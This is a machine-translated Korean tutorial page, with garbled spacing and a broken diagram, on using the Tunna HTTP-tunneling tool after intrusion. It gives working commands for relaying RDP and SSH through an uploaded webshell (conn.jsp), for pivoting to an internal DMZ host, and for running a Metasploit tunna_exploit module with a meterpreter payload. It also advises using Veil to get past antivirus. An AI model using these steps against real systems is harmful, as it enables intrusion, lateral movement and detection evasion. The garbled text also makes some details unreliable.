HTTP tunneling 도구 - 포트 전송
6396 단어 침투 테스트
!php +——————————————-+ +——————————————-+
Local Host
Remote Host
+———-+ +————+
+————-+
+————+ +———-+
Client App
+—–>
+———-+ +————+
+————-+
+————+ +———-+
+ - - - - - + - - - - - - - - - - - - + 이 도 구 는 먼저 proxy. py 를 사용 하여 로 컬 포트 를 감청 한 다음 원 격 WEB 에 배 치 된 웹 셸 에 연결 합 니 다. 원 격 웹 셸 은 포트 전송 요청 을 로 컬 또는 로 컬 네트워크 원 격 호스트 로 전송 하여 HTTP tunneling 을 실현 합 니 다. 이것 은 네트워크 침입 에 있어 서아주 유용 한 도구 입 니 다.
이 도 구 는 어디서 많이 본 듯 한 느낌 이 들 지 않 나 요? 네, 사실은 reduh 원리 와 같 지만 tunna 가 더 안정 적 이 고 속도 가 빠 릅 니 다.
다운로드 주소:http://www.secforce.com/media/tools/tunna_v0.1.zip
다음은 네 개의 실례 를 설명 하면 이 도구 의 사용 방법 을 파악 할 수 있다.
실례 1:
사 이 트 는 대외 적 으로 80 포트 만 열 렸 고 다른 포트 는 모두 닫 혔 습 니 다. CVE - 2013 - 225 를 통 해 JSP 의 WEBSHELL 을 얻 은 후 conn. jsp 를 업로드 하여 퍼 가기 하여 본 컴퓨터 에 연 결 된 다른 포트 를 실현 합 니 다. 직접 스 캔 한 결과 3389 가 닫 혔 습 니 다.
mickey@pentest:~# nmap -sS -p3389 219.x.x.x
Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT STATE SERVICE
3389/tcp close
webshell conn.jsp ,
python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v
:
-l
-r
-v
rdesktop 127.0.0.1:1234
3389
실례 2:
일부 서비스, 예 를 들 어 SSH 는 - s 인 자 를 추가 해 야 연결 이 끊 기지 않 습 니 다.
python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s
ssh localhost -p 1234
실례 3:
장면: DMZ 구역 의 호스트 JSPSHELL 을 받 았 습 니 다. 이 호스트 의 네트워크 IP 는 172.16.100.20 입 니 다. 점검 을 통 해 DMZ 구역 에 다른 호스트 (172.16.100.20) 가 있 고 3389 가 개방 되 었 습 니 다. 우 리 는 HTTP tunneling 을 이용 하여 172.16.100.20 의 3389 에 연결 하고 싶 습 니 다. 명령 은 다음 과 같 습 니 다.
python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389
-a , IP
실례 4:
metasploit 를 좋아 하 는 친구 에 게 도 이 도 구 는 지원 하지만, 상대방 이 부 드 럽 게 죽 일 수 있다 면, 먼저 veil 로 meterpreter 의 살 을 면 하 는 것 을 권장 합 니 다.
tunna_exploit.rb msf modules/exploits/windows/misc .
cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j
tunna jsp
conn.jsp Tested on Apache Tomcat (windows + linux) conn.aspx Tested on IIS 6+8 (windows server 2003/2012) conn.php Tested on LAMP + XAMPP + IIS (windows + linux)
사용 시 주의해 야 할 것: metasploit 의 스 크 립 트 는 metasploit 에 만 적 용 됩 니 다.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
cve-2019-0708 msf 실행 오류 해결cve-2019-0708 msf 실행 오류 해결 서버에 빈틈이 있는지 검사하는 과정에서 exploit의 오류가 발견되었고 오류 정보는 다음과 같다. 이미 뚜렷하다Exploit aborted due to failure...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.